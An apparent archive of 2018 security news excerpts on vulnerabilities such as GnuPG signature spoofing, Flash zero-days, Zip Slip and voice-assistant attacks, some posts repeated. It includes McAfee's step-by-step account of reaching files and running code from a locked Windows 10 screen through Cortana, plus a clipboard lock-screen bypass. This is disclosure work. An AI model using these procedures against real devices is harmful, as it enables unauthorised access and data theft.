Category Archives: Vulnerability

The State of Security: Google’s Newest Feature: Find My Home

The commoditization of personal data in recent years has created huge opportunities for anyone with the skills to collect, catalogue and correlate every aspect of our lives. For many years now, there has been a war between browser vendors and unscrupulous advertisers looking for tricks to uniquely identify users and track their movements across websites. […]… Read More

The post Google’s Newest Feature: Find My Home appeared first on The State of Security.



The State of Security

Google’s Newest Feature: Find My Home

The commoditization of personal data in recent years has created huge opportunities for anyone with the skills to collect, catalogue and correlate every aspect of our lives. For many years now, there has been a war between browser vendors and unscrupulous advertisers looking for tricks to uniquely identify users and track their movements across websites. […]… Read More

The post Google’s Newest Feature: Find My Home appeared first on The State of Security.

Vulnerability in GnuPG allowed digital signature spoofing for decades

A vulnerability affecting GnuPG has made some of the widely used email encryption software vulnerable to digital signature spoofing for many years. The list of affected programs includes Enigmail and GPGTools. About the vulnerability (CVE-2018-12020) CVE-2018-12020, dubbed “SigSpoof” by Marcus Brinkmann, the researcher which found it, arises from “weak design choices.” “The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a “–status-fd 2” option, which … More

The post Vulnerability in GnuPG allowed digital signature spoofing for decades appeared first on Help Net Security.

Unintended Clipboard Paste Function in Windows 10 Leads to Information Leak in RS1

The McAfee Labs Advanced Threat Research team has been investigating the Windows 10 platform. We have submitted several vulnerabilities already and have disclosed our research to Microsoft. Please refer to our vulnerability disclosure policy for further details or the post from earlier this week on Windows 10 Cortana vulnerabilities.

Early last year, a trivial “information leak” was reported in Windows 10. This technique no longer works on most current builds of Windows 10, but a variation of this simple method works quite well on some versions of Windows 10, specifically RS1 (RedStone 1).

The issue is simple to describe and execute. For a local attack, you can use a physical keyboard; if there is a network vector that would allow one to remotely reach the Windows login screen (such as RDP), you can use the software-based keyboard accessible from the lock screen. On all versions of Windows 10, the “paste” function appears to be intentionally forbidden from the Windows lock screen, including the “Hey Cortana” function. The original finding demonstrated CTRL+V could be used to paste clipboard contents. This is now disabled, even on RS1. However, we have found a way to bypass this restriction using the keyboard shortcut CTRL + SHIFT + INSERT, allowing us to access in plain text the clipboard contents, whatever they may be. While we are continuing to explore this technique to force-copy functions (and access arbitrary content), for now we can access whatever happens to be copied. In the demo this is a password allowing login.


The post Unintended Clipboard Paste Function in Windows 10 Leads to Information Leak in RS1 appeared first on McAfee Blogs.

Researcher hacks smart fingerprint padlock in mere seconds

The Tapplock one “smart” padlock, which received many rave reviews by tech-focused news sites and YouTubers, can be forced to open in under two seconds with a smartphone. The discovery was made by Pen Test Partners researcher Andrew Tierney, who decided to probe the security of the software used by the product after seeing a YouTuber opening a locked Tapplock one by simply unscrewing its back and a few internal screws. Breaking into the “smart” … More

The post Researcher hacks smart fingerprint padlock in mere seconds appeared first on Help Net Security.

New ‘Lazy FP State Restore’ Vulnerability Found in All Modern Intel CPUs

Hell Yeah! Another security vulnerability has been discovered in Intel chips that affects the processor's speculative execution technology—like Specter and Meltdown—and could potentially be exploited to access sensitive information, including encryption related data. Dubbed Lazy FP State Restore, the vulnerability (CVE-2018-3665) within Intel Core and Xeon processors has just been confirmed

Smashing Security #082: World Cup cybersecurity, crypto crashes, and a bang of a password fail

Ss episode 82 thumb

Coinrail cryptocurrency exchange goes offline after hack, Russia appears to be ‘live testing’ cyber attacks, and Florida stopped running background checks on gun buyers because of forgotten password.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by football-mad John Leyden from The Register.

Cortana Software Could Help Anyone Unlock Your Windows 10 Computer

Cortana, an artificial intelligence-based smart assistant that Microsoft has built into every version of Windows 10, could help attackers unlock your system password. With its latest patch Tuesday release, Microsoft has pushed an important update to address an easily exploitable vulnerability in Cortana that could allow hackers to break into a locked Windows 10 system and execute malicious

Fooling security tools into believing malicious code was signed by Apple

The way developers of third-party security tools use the Apple code signing API could be exploited by attackers to make malicious code linger undetected on Macs, a security researcher has discovered. “Security, incident response, and forensics processes and personnel use code signing to weed out trusted code from untrusted code. To undermine a code signing implementation for a major OS would break a core security construct that many depend on for day to day security … More

The post Fooling security tools into believing malicious code was signed by Apple appeared first on Help Net Security.

New Cortana Vulnerability Could Allow Cybercriminals to Bypass Lock Screen On Windows 10 Devices

Digital assistants help us look up the weather, play our favorite music, and allow us to quickly access a lot of our personal information. And between Amazon Alexa, Google Home, and Microsoft Cortana – these services have become all the rage these days. However, the latter service, according to the McAfee Labs Advanced Threat Research (ATR) team, can be easily compromised, which is why they’ve submitted a vulnerability to Microsoft which involves the default settings for Windows 10 and the Cortana voice assistant. The vulnerability can be used to do things such as retrieve information from Cortana, start an application from the Windows lock screen, and even log into a Windows 10 device without a user interacting with the computer.

To give you an idea of how someone can take advantage of this vulnerability, let’s first back up. Imagine you are sitting at your favorite coffee shop and need to use the restroom. As a security-minded individual, you lock your computer’s screen thinking that would keep bad people from accessing your information. With this vulnerability, all someone would have to do is say, “Hey Cortana,” then follow a few simple steps to gain access to the treasure trove of information, no reboot required.

By taking advantage of this vulnerability, McAfee researcher Cedric Cochin discovered that by simply typing while Cortana starts to listen to a request or question on a locked device, he could bring up a search menu. Cochin didn’t even have to say anything to Cortana, but simply clicked on the “tap and say” button and started typing in words. At that point, he could hover over search results, which included documents and other files, and see where they led to on that computer. What’s more – he was able to take it a step further and figured out a way to access certain confidential files and information.

Though there are limitations to what cybercriminals could do, there are ways they can get the right file results to show up, which have been outlined in our McAfee Labs blog post on this topic. After leveraging one of these techniques, cybercriminals could use this vulnerability to take malicious actions such as resetting passwords on a Windows 10 computer, even though the device is technically locked. In only a few seconds, an attacker has full access to a computer.

With the discovery of this vulnerability, the next question is – what can I do to not be a victim of this? Start by following these security tips:

  • Don’t leave your computer unattended. It’s important to note that this vulnerability is completely dependent on physical access to a Windows 10 computer with Cortana. Now that this vulnerability has been disclosed it’s important that you keep a close eye on your computer until you apply the update from Microsoft.
  • Apply updates immediately. The good news is – today is Patch Tuesday! And fortunately the update that Microsoft is rolling out today has a fix for this vulnerability to protect your Windows 10 computer. Be sure to update your computer immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post New Cortana Vulnerability Could Allow Cybercriminals to Bypass Lock Screen On Windows 10 Devices appeared first on McAfee Blogs.

VMware plugs RCE hole in remote management agent

VMware has fixed a critical remote code execution vulnerability in VMware AirWatch Agent for Android and Windows Mobile, and is urging users to upgrade to the newest versions of the software (8.2 and 6.5.2, respectively). The iOS version is not affected. VMware AirWatch Agent is a mobile File Manager application and is part and parcel of the VMware Workspace ONE platform (powered by AirWatch unified endpoint management technology). About the vulnerability (CVE-2018-6968) “VMware Workspace ONE … More

The post VMware plugs RCE hole in remote management agent appeared first on Help Net Security.

Want to Break Into a Locked Windows 10 Device? Ask Cortana (CVE-2018-8140)

June’s “Patch Tuesday” (June 12) is here, but it is likely many Windows 10 users have not yet applied these updates. If you have not, just be sure not to leave your laptop lying around! The patches in this cycle fix a code execution vulnerability using the default settings for Windows 10 and the “Cortana” voice assistant. We’ll detail how this vulnerability can be used to execute code from the locked screen of a fully patched Windows 10 machine (RS3 at the time of our original submission, and confirmed on RS4 prior to this patch cycle). The vulnerability was submitted to Microsoft as part of the McAfee Labs Advanced Threat Research team’s responsible disclosure policy, on April 23. Attribution for this vulnerability submission goes to Cedric Cochin, Cyber Security Architect and Senior Principle Engineer.

In this post, we will address three vectors of research that have been combined by Microsoft and together represent CVE-2018-8140. The first of these is an information leak, but we’ll culminate with a demo showing full code execution to log in to a locked Windows device!

Using “Hey Cortana!” to Retrieve Confidential Information

Personal digital assistants such as Siri, Alexa, Google Assistant, and Cortana have become commodities in many technologically inclined houses. From telling jokes, to helping with the grocery list, to turning on the kitchen lights, these robotic voices are beginning to feel oddly more and more personal as they expand their roles in our daily lives. However, we should consider the increased risk of built-in digital personal assistants when looking at new attack vectors for laptops, tablets, and smartphones. Our research on Microsoft’s Cortana voice assistant began after reading about the “BadUSB” attacks demonstrated by industry researchers. We decided to take this a step further and ended up finding and reporting to Microsoft several issues related to Cortana.

If you have spoken with Cortana, you may have noticed that “she” is very helpful for a number of simple tasks: providing definitions, or looking up corporations, movies, artists, or athletes. She can even do math! In Windows 10, on the most recent build at the time of submission, we observed that the default settings enable “Hey Cortana” from the lock screen, allowing anyone to interact with the voice-based assistant. This led to some interesting behavior and ultimately vulnerabilities allowing arbitrary code execution.

We begin this analysis with a quick look into Windows indexing. If you have ever opened the advanced view of the Windows Indexing control panel, and navigated to the File Types tab, you will see a long list of file extensions. For each of them you will find details about the associated filter used by the indexing process. Essentially you have the “file properties filter” and several other filters that could all be summarized as “file properties and file content filter.”

This means the index process will crack open the files and index their content, including some strings present in these documents. Let’s keep that in mind for later as we continue.

Using this knowledge, we wanted to try to access the same menu that you would see when using a Cortana search on an unlocked device.

This will come as a surprise and lies at the core of all the issues we found, but simply typing while Cortana starts to listen to a query on a locked device will bring up a Windows contextual menu, as shown below:

On top: the result of typing “pas” in the Cortana search field on an unlocked computer.
Above: the result of asking “Hey Cortana, P A S” and using a whitespace keyboard sequence.

In the preceding example, we queried Cortana for the term pas, no preamble to the question, just speaking the three letters, P. A. S. Why not “pass”? Because Cortana can be quite picky with verbal statements and there is no dictionary definition for “pass,” leading to Cortana inviting us to continue in Edge after unlocking the device. Alternatively, instead of issuing a verbal statement, we could click on the “tap and say” button and just start typing this text, for example.

We now have a contextual menu, displayed on a locked Windows 10 device. What could go wrong?

Remember that all the results presented by Cortana come from indexed files and applications, and that for some applications the content of the file is also indexed. Now we can simply hover over any of the relevant matches. If the match is driven by filename matching, then you will be presented with the full path of the file. If the match is driven by the file content matching, then you may be presented with the content of the file itself.

Keep in mind that the entire user folder structure is indexed, which includes the default location for most documents but also for mappings like OneDrive.

Example of data leakage using voice command with Cortana and the whitespace keyboard sequence.

Armed with this knowledge, you can use your imagination to come up with specific keywords that could be used to start harvesting confidential information from the locked device.

Code Execution from the Windows Lock Screen (User Interaction May be Required)

Next, we asked the question: Could we go a step further and get code execution in the context of the authenticated user? Remember we are using only a combination of voice commands and mouse/touchpad/touchscreen to gain access to the contextual menu at this point. We observed that just by hovering over a file, the full path or content of the file would be displayed. What happens if we were to click on it? That depends on the target. If the file being opened is an application or an executable (such as notepad or calc.exe), the file will run and be accessible only after the user properly logs in. If it is a document, script, or text file, it will be opened by an editor instead of being executed. At this point we can execute various preloaded Windows utilities such as calculator, but we cannot pass any parameters to the command line. We can open scripts including PowerShell, but instead of being executed, they will be opened in a text editor (notepad). The lack of parameters is a limitation for a “live off the land” attack, which uses current tools and content to achieve a malicious purpose; however, there are plenty of malicious activities that could be performed even with these restrictions. For example, many uninstallers will happily remove software without any need for parameters.

Let’s return to our goal: code execution from the lock screen. The only requirement for something to show up in the contextual menu is for it to be indexed.

Public folders indexed by default.

There are multiple ways for an unauthenticated attacker to get results to show up in the index of an authenticated user. One method relies on OneDrive. As the root of the OneDrive directory structure is in the user folder, all the OneDrive content is indexed by default. Basically, if you ever share a folder or file with “edit” rights, the person you share it with, as well as any other recipients of a forwarded link, can now drop a file that will be indexed. With the file indexed we have multiple options to proceed.

Option 1: Drop an Executable File

This method assumes you can write an executable file to the disk; it does not require you to have executed it. Via a phishing attack or another vulnerability, an attacker could drop a backdoor (for example, Cobalt Strike Beacon or Meterpreter) and be in business. If you need to execute the payload as an administrator, you can simply right-click (for a touchscreen this is a longer-hold screen press) and select “Run as administrator.”

When running applications that do not have the Auto-Elevate Privilege, you will trigger a user account control (UAC) prompt and nothing will execute. This could still result in a valid attack because users rarely check the content of the prompt and often proceed through the warning dialog box. The attacker would have to execute the program, and then wait for the authenticated user to log in and finish the job. If the application has auto-elevate privileges, there will be no UAC prompt and the application will execute at high integrity.

This is interesting behavior, but on its own not a very likely attack scenario, so let’s continue to explore our options. Why not simply use a USB key to drop the payload because we have physical access? The content of the USB key is not indexed, so it would not be presented as a result of the search query (although there are other ways to use a USB device; see below).

Option 2: Drop a non-PE Payload

Portable executable (PE) backdoors are great, but can we gain execution with a non-PE payload, for example, a PowerShell script?  We can use the same right-click capability to assist, but with a small twist. The right-click menu is not always the same, even for a given file type.

When you ask Cortana about “PS1,” you will be presented with your indexed PowerShell scripts. A right click will allow you to “open file location” or “copy full path,” but with no means of execution.

If you click on the file as we already mentioned, the file will open in edit mode. Curiously, it will not open the default editor (PowerShell ISE) for PowerShell scripts; instead, it will open the script in notepad. We assume this was intended as a security measure because notepad cannot execute scripts, unlike PowerShell ISE.

The default right-click menu for PS1 files.

Remember we mentioned that Cortana changes results based on your input query? When properly logged in, if you ask Cortana about “txt” using the query “Hey Cortana” followed by the letters “T,” “X,” “T,” she will present you with text documents, Notepad, and the most recent documents open by Notepad. Yet the right-click menu for items in the Recent category is different than the right-click menu for the same item in the Documents category.

At top:the context menu for a Recent item; above: the context menu for a Document item.

We follow a three-step process:

  • Land a PowerShell script in a location that will be indexed
    • Public folder, public share, or OneDrive
  • Execute a search query that will show the document and click on it
    • “Hey Cortana, PS1”
    • Select the PowerShell script you just indexed and left click
    • The PowerShell script opens in Notepad
  • Execute a search query that will show the recent documents, right click, and…
    • Using Cortana, type or search in the contextual menu for “txt”
    • Right click on the PowerShell script in the Recent category under the Apps tab at the top (not Documents)
    • Click “Run with PowerShell”

“Run with PowerShell” right-click menu option for Recent items.

We now have local code execution with the payload of our choosing, without any exploit, even if the device is encrypted, on an up-to-date locked Windows 10 device.

This technique helps us understand some of the differences between apps, documents, extensions, and the way Windows handles them from a locked or unlocked screen. Yet it probably does not represent much of a real-world attack vector. Then again, we are not finished.

Logging into a Locked Device with no User Interaction

Finally, we have local code execution, but with some real limitations. We need to get our payload indexed but we cannot pass command-line parameters. This could be a limiting factor for our PowerShell attack vector because the execution policy may prevent its execution, and without command-line parameters we cannot pass an “-ExecutionPolicy Bypass” (or any other flavor). We would also have to find a way to land a PS1 script on the victim’s box, and have remote access to the physical machine or the login screen.

The techniques we have described so far are far too complicated compared with the simplicity and effectiveness of what comes next.

You recall the use of the keyboard-timing sequence to trigger the contextual search menu from a locked screen while querying Cortana. Any keystroke can trigger the menu from the time when Cortana begins to listen to when the answer is displayed. Press any key at this point; we like to use the spacebar because you cannot backspace and Windows will nicely ignore or trim out the space in its text results anyways. Invoke keyboard input too early or before Cortana is listening and you will be prompted to enter your password; invoke too late and Cortana goes back to sleep or returns normal results without a context menu.

It is not very intuitive to use the keyboard in addition of voice commands, but you can type your search the same way you do on an unlocked device, assuming that you triggered Cortana to listen.

The following screenshot demonstrates this behavior:

  • Trigger Cortana via “Tap and Say” or “Hey Cortana”
  • Ask a question (this is more reliable) such as “What time is it?”
  • Press the space bar, and the context menu appears
  • Press esc, and the menu disappears
  • Press the space bar again, and the contextual menu appears, but this time the search query is empty
  • Start typing (you cannot use backspace). If you make a mistake, press esc and start again.
  • When done (carefully) typing your command, click on the entry in the Command category. (This category will appear only after the input is recognized as a command.)
  • You can always right click and select “Run as Administrator” (but remember the user would have to log in to clear the UAC)

You can use the following example of a simple PowerShell command to test. Enjoy the soothing beeps that demonstrate code execution from a locked device.

What can we do at this point? You name it. Our demo shows a password reset and login on a Windows 10 build, using only this simple technique.

The easiest mitigation technique, in the absence of patching the device (which we strongly recommend), is to turn off Cortana on the lock screen. This week’s Patch Tuesday from Microsoft contains fixes for these issues under CVE-2018-8140.

This concludes our examination of Cortana (at least for now). The McAfee Advanced Threat Research team has a fundamental goal of eliminating critical threats to the hardware and software we use; this month’s patch is a clear step toward furthering that goal. The attack surface created by vocal commands and personal digital assistants requires much more investigation; we are just scratching the surface of the amount of research that should be conducted in this critical area.

The post Want to Break Into a Locked Windows 10 Device? Ask Cortana (CVE-2018-8140) appeared first on McAfee Blogs.

Thousands of Android Devices Running Insecure Remote ADB Service

Despite warnings about the threat of leaving insecure remote services enabled on Android devices, manufacturers continue to ship devices with open ADB debug port setups that leave Android-based devices exposed to hackers. Android Debug Bridge (ADB) is a command-line feature that generally uses for diagnostic and debugging purposes by helping app developers communicate with Android devices

McAfee Blogs: Millions of Facebook Users May Have Unknowingly Shared Posts Publicly Because of New Bug

Facebook, Facebook, Facebook – between malware leveraging Facebook Messenger to send phishing messages, to apps on the platform mishandling customer data, the social media network has dealt with its fair share of cybersecurity woes these past few months. And just this week, yet another issue has emerged. It was discovered that a bug within Facebook may have accidentally changed settings for 14 million users, causing their posts to be shared publicly, even if they thought they were being shared only with friends.

When users share something on Facebook, they’re shown an audience selector, which provides a handful of options for who exactly gets to see a post. The user can select “Friends,” “Only me,” “Friends except,” or “Public,” with the choice supposedly defaulting to the one last used by the account owner. However, this bug made it so the default for all posts was set to public – meaning if the user was not paying attention, they unwittingly shipped their post out to a larger audience than they were anticipating.

Now, the good news is this bug was only affecting posts that went out from May 18th to May 27th, and no posts prior to that period were affected. Additionally, Facebook has confirmed that the bug has in fact been fixed.

However, this bug does act as a lesson about sharing out personal information on social media and reminds us to always be cautious of what we put out on the web. That being said, here are a few proactive security tips you can follow when sharing info on social media:

  • Always check in on your settings. This bug is a reminder that we should always check in on our current settings on social media platforms and apps. This bug swapped the settings without notifying users, but sometimes we may even too forget if we have the right settings on. Make it a priority a few times a month to go and see if you have the correct security settings in place on all your apps.
  • Be selective about what you share. The best way to control where your information goes is by cutting down what you share and how much you share it. That means reducing the amount of times you post on social media, and the type of information you do share. Anything private, personal, or that could help a cybercriminal learn more about you should remain off your social channels.
  • Use comprehensive security. Even though this data was willingly given, it’s important you still lock down all your devices with an extra layer of security to help keep yourself safe. To do just that, use a comprehensive solution such as McAfee Total Protection, in addition to limiting the amount of personal data you post and share.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Millions of Facebook Users May Have Unknowingly Shared Posts Publicly Because of New Bug appeared first on McAfee Blogs.



McAfee Blogs

Millions of Facebook Users May Have Unknowingly Shared Posts Publicly Because of New Bug

Facebook, Facebook, Facebook – between malware leveraging Facebook Messenger to send phishing messages, to apps on the platform mishandling customer data, the social media network has dealt with its fair share of cybersecurity woes these past few months. And just this week, yet another issue has emerged. It was discovered that a bug within Facebook may have accidentally changed settings for 14 million users, causing their posts to be shared publicly, even if they thought they were being shared only with friends.

When users share something on Facebook, they’re shown an audience selector, which provides a handful of options for who exactly gets to see a post. The user can select “Friends,” “Only me,” “Friends except,” or “Public,” with the choice supposedly defaulting to the one last used by the account owner. However, this bug made it so the default for all posts was set to public – meaning if the user was not paying attention, they unwittingly shipped their post out to a larger audience than they were anticipating.

Now, the good news is this bug was only affecting posts that went out from May 18th to May 27th, and no posts prior to that period were affected. Additionally, Facebook has confirmed that the bug has in fact been fixed.

However, this bug does act as a lesson about sharing out personal information on social media and reminds us to always be cautious of what we put out on the web. That being said, here are a few proactive security tips you can follow when sharing info on social media:

  • Always check in on your settings. This bug is a reminder that we should always check in on our current settings on social media platforms and apps. This bug swapped the settings without notifying users, but sometimes we may even too forget if we have the right settings on. Make it a priority a few times a month to go and see if you have the correct security settings in place on all your apps.
  • Be selective about what you share. The best way to control where your information goes is by cutting down what you share and how much you share it. That means reducing the amount of times you post on social media, and the type of information you do share. Anything private, personal, or that could help a cybercriminal learn more about you should remain off your social channels.
  • Use comprehensive security. Even though this data was willingly given, it’s important you still lock down all your devices with an extra layer of security to help keep yourself safe. To do just that, use a comprehensive solution such as McAfee Total Protection, in addition to limiting the amount of personal data you post and share.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Millions of Facebook Users May Have Unknowingly Shared Posts Publicly Because of New Bug appeared first on McAfee Blogs.

Adobe releases fix for actively exploited Flash Player zero-day

If you’re still using Flash Player, it’s time to update it again – and quickly: Adobe has just patched a critical zero day vulnerability (CVE-2018-5002) actively exploited in the wild. The attacks are “limited, targeted attacks against Windows users,” but updates (v30.0.0.113 for all platforms) are available for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. About CVE-2018-5002 and the attacks It is a stack-based buffer overflow vulnerability that has been independently discovered … More

The post Adobe releases fix for actively exploited Flash Player zero-day appeared first on Help Net Security.

SecurityOrb.com: Wireshark Security Advisory

- ------------------------------------------------------------------------- Debian Security Advisory DSA-4217-1 security@debian.org https://www.debian.org/security/ Moritz Muehlenhoff June 03, 2018 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : wireshark CVE ID : CVE-2018-9273 CVE-2018-7320 CVE-2018-7334 CVE-2018-7335 CVE-2018-7419 CVE-2018-9261 CVE-2018-9264 CVE-2018-11358 CVE-2018-11360 CVE-2018-11362 It was discovered [...]

The post Wireshark Security Advisory appeared first on SecurityOrb.com.



SecurityOrb.com

Adobe Patched Zero-Day Vulnerability




Adobe has recently issued a security update for Flash Player in order to fix a zero-day vulnerability that was exploited by attackers in the wild.

The Flash Player vulnerability (CVE-2018-5002), a stack-based buffer over-flow bug that could empower discretionary code execution, was taken care of on the seventh of June.

The weakness was found and independently made public to a few security firms significantly including the ICEBRG, Tencent, and two security divisions from Chinese digital security mammoth Qihoo 360. Tracked as CVE-2018-5002, it effectively impacts Adobe Flash Player 29.0.0.171 and its earlier versions although it was reported to be settled with the timely release of Flash Player 30.0.0.113.

 “It allows for a maliciously crafted Flash object to execute code on victim computers, which enables an attacker to execute a range of payloads and actions,” said the researchers from ICEBRG's Security Research Team, who were the first to report the discovered vulnerability.

The exploit utilizes a cautiously developed Microsoft Office report to download and execute an Adobe Flash exploit to the victims' PC, as per ICEBRG analysts. The documents were sent basically through email, as per Adobe.

Both ICEBRG and Qihoo 360 discovered evidence that proposed that the exploit was focusing on Qatari victims, in light of the geopolitical interests.

“The weaponized document … is an Arabic language themed document that purports to inform the target of employee salary adjustments,” ICEBRG researchers said. “Most of the job titles included in the document is diplomatic in nature, specifically referring to salaries with positions referencing secretaries, ambassadors, diplomats, etc.”

As indicated by Will Dormann of CERT/CC, other than fixing the actual imperfection, Adobe likewise included an extra dialog window that inquires the users as to whether they want to stack remote SWF records inside Office documents or not. The incite relief additionally comes to settle an issue with Office applications, where Flash content is in some cases downloaded consequently, without provoking the user ahead of time.




Vulnerable ship systems: Many left exposed to hacking

Pen Test Partners’ Ken Munro and his colleagues – some of which are former ship crew members who really understand bridge and propulsion systems – have been probing the security of ships’ IT systems for a while now and the results are depressing: satcom terminals exposed on the Internet, admin interfaces accessible via insecure protocols, no firmware signing, easy-to-guess default credentials, and so on. “Ship security is in its infancy – most of these types … More

The post Vulnerable ship systems: Many left exposed to hacking appeared first on Help Net Security.

Smashing Security #081: Hacker no-hopers, Wessex Water has a word, and we win an award

Smashing Security #081: Hacker no-hopers, Wessex Water has a word, and we win an award

The ‘mastermind’ behind the Owari botnet doesn’t seem to have learnt anything from his victims, someone at Wessex Water forgets to remove an embarrassing sentence from a letter sent to customers, and we’re officially the best security podcast!

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, with cameo appearances by John Hawes, John Leyden, Paul Ducklin, and Mikko Hyppönen.

The Value of Capture the Flag Competitions

If you’ve ever attended an infosec or hacker conference, you’re sure to have seen the Capture the Flag or CTF. As with anything in this industry, there are ebbs and flows in the debate of the value of the competitions. Some argue that they are unrealistic. Others champion them for the skills required and the […]… Read More

The post The Value of Capture the Flag Competitions appeared first on The State of Security.

Zip Slip vulnerability affects thousands of projects

An arbitrary file overwrite vulnerability that can be exploited by attackers to achieve code execution on a target system affects a myriad of projects and multiple ecosystems, Snyk researchers have revealed. About the vulnerability The vulnerability, dubbed Zip Slip by the researchers, has been seen in the past before, but was never this widely spread, Snyk CEO Guy Podjarny told Help Net Security. “Zip Slip is a form of directory traversal that can be exploited … More

The post Zip Slip vulnerability affects thousands of projects appeared first on Help Net Security.

‘Zip Slip’ Vulnerability Affects Thousands of Projects Across Many Ecosystems

Security researchers at British software firm Snyk have revealed details of a critical vulnerability that affects thousands of projects across many ecosystems and can be exploited by attackers to achieve code execution on the target systems. Dubbed "Zip Slip," the issue is an arbitrary file overwrite vulnerability that triggers from a directory traversal attack while extracting files from an

Dozens of Vulnerabilities Found Under Hack the DTS Bug Bounty Program

The Hack the DTS bug bounty program uncovered dozens of vulnerabilities in the Defense Travel System serving the Department of Defense. On 30 May, vulnerability coordination platform HackerOne revealed the results of Hack the DTS. Nineteen trusted security researchers participated in the 29-day program and submitted 100 vulnerability reports over the course of the exercise. […]… Read More

The post Dozens of Vulnerabilities Found Under Hack the DTS Bug Bounty Program appeared first on The State of Security.

Researchers discover vulnerabilities in smart assistants’ voice commands

Virtual personal assistants (VPA), also known as smart assistants like Amazon’s Alexa and Google’s Assistant, are in the spotlight for vulnerabilities to attack. Take, for example, that incident about an Oregon couple’s Echo smart speaker inadvertently recording their conversation and sending it to a random contact. Or that time when the Alexa started laughing out of the blue. Indeed, something has to be done about these hacks, whether they’re by accident or not.

Earlier this month, researchers from Indiana University, the Chinese Academy of Sciences, and the University of Virginia found exploitable weaknesses in the VPAs above. Researchers dubbed the techniques they used to reveal these weaknesses as voice squatting and voice masquerading. Both take advantage of the way smart assistants process voice commands. Unsurprisingly, these also exploit users’ misconceptions about how such devices work.

How smart assistants work

VPA services used in smart speakers can do what they’re created to do with the use of apps called “skills” (by Amazon) or “actions” (by Google). A skill or an action provides a VPA additional features. Users can interact with a smart assistant via a virtual user interface (VUI), allowing them to run a skill or action using their voice.

Entrepreneurs, with the help of developers, are already taking advantage of creating their own voice assistant (VA) apps to cater to client needs, making their services accessible in the voice platform, or merely introducing an enjoyable experience to users.

As of this writing, the smart assistant apps market is booming. Alexa skills alone already has tens of thousands, thanks to the Alexa Skill Kit. Furthermore, Amazon has recently released Alexa Skill Blueprints, making skills creation easy for the person who has little to no knowledge of coding.

Unfortunately, the availability of such a kit to the public has made abuse by potential threat actors possible, making the VPA realm an entirely new attack vector. If an attack is successful—and the study researchers conducted proved that it can be—a significant number of users could be affected. They concluded that remote, large-scale attacks are “indeed realistic.”

Squatters and masqueraders

Voice squatting is a method wherein a threat actor takes advantage or abuses the way a skill or action is invoked. Let’s take an example used from the researchers’ white paper. If a user says, “Alexa, open Capital One” to run the Capital One skill, a threat actor can potentially create a malicious app with a similarly pronounced name, such as Capital Won. The command meant for the Capital One skill is then hijacked to run the malicious Capital Won skill instead. Also, as Amazon is now rewarding kids for saying “please” when commanding Alexa, a similar hijacking can occur if a threat actor uses a paraphrased name like Capital One please or Capital One Police.

“Please” and “police” may mean two totally different things to us, but for current smart assistants, these words are the same, as they cannot correctly recognize one invocation name over another similar-sounding one.

Suffice to say, VPAs are not great at handling homophones.


Read: Out of character: Homograph attacks explained


Voice masquerading, on the other hand, is a method wherein a malicious skill impersonates a legitimate one to either trick users into giving out their personal information and account credentials or eavesdrop on conversations without user awareness.

Researchers identified two ways this attack can be made: in-communication skill switch and faking termination. The former takes advantage of the false assumption that smart assistants readily switch from one skill to another once users invoke a new one. Going back to our previous example, if Capital Won is already running and the user decides to ask “Alexa, what’ll the weather be like today?”, Capital Won then pretends to hand over control to the Weather skill in response to the invocation when, in fact, it is still Capital Won running but this time impersonating the Weather skill.

As for the latter, faking termination abuses volunteer skill termination, a feature wherein skills can self-terminate after delivering a voice response such as “Goodbye!” to users. A malicious skill can be programmed to say “Goodbye!” but remain running and listening in the background for a given length of time.

But…I like my smart assistant!

No need to box up your smart speakers and send them back if these vulnerabilities worry you. But it is essential for users to really get to know how their voice assistant works. We believe that doing so can make a significant difference in maintaining one’s privacy and protecting from attack.

“Making devices, such as Alexa, responsible for important systems and controls around the house is concerning, especially when evidence emerges that it’s able to turn a simple mistake into a potentially serious consequence,” our very own Malware Intelligence Analyst Chris Boyd said in an interview with Forbes.

Smart assistants and IoT, in general, are still fairly new tech, so we expect improvements in the AI, and the security and privacy efforts within this sector. Both Amazon and Google have claimed they already have protections against voice squatting and voice masquerading.

While it is true that the researchers had already met with both firms to help them understand these threats further and offer them mitigating steps, they remain skeptical about whether the protections put in place are indeed adequate. Only time will tell.

The post Researchers discover vulnerabilities in smart assistants’ voice commands appeared first on Malwarebytes Labs.

Quantifying cyber exposure: Attackers are racing ahead

Cybercriminals have a median seven-day window of opportunity during which they can exploit a vulnerability to attack their victims, potentially siphoning sensitive data, launching ransomware attacks and causing extensive financial damage before organizations even take the first step to determine their cyber exposure and whether they are at risk. According to a new Tenable report, it takes a median six days for a cybercriminal to weaponize vulnerabilities once a new public exploit first becomes available. … More

The post Quantifying cyber exposure: Attackers are racing ahead appeared first on Help Net Security.

Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

Security researchers have discovered a series of new vulnerabilities in EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running the critical blockchain-based applications. EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain

Smashing Security #079: Mugshots, mobile mania, and back end gurus

Smashing Security #079: Mugshots, mobile mania, and back end gurus

A website which demands money if you want your mugshot removed, could “sharenting” lead to a rise in fraud and identity theft, and how could the FBI have overcounted encrypted phones so badly?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.

Penetration Tests Discover All Banks Are Susceptible to Web App Bugs

A series of penetration tests found that every bank is guilty of web application vulnerabilities and insufficient network security measures. According to a recent report from Positive Technologies, Bank Attacks 2018, 100 percent of banks suffered from these vulnerabilities and inadequacies.

The report also found sever configuration flaws in all banks — while just over half were found to have improperly managed their user accounts and passwords.

Bank on It: Poor Security Practices

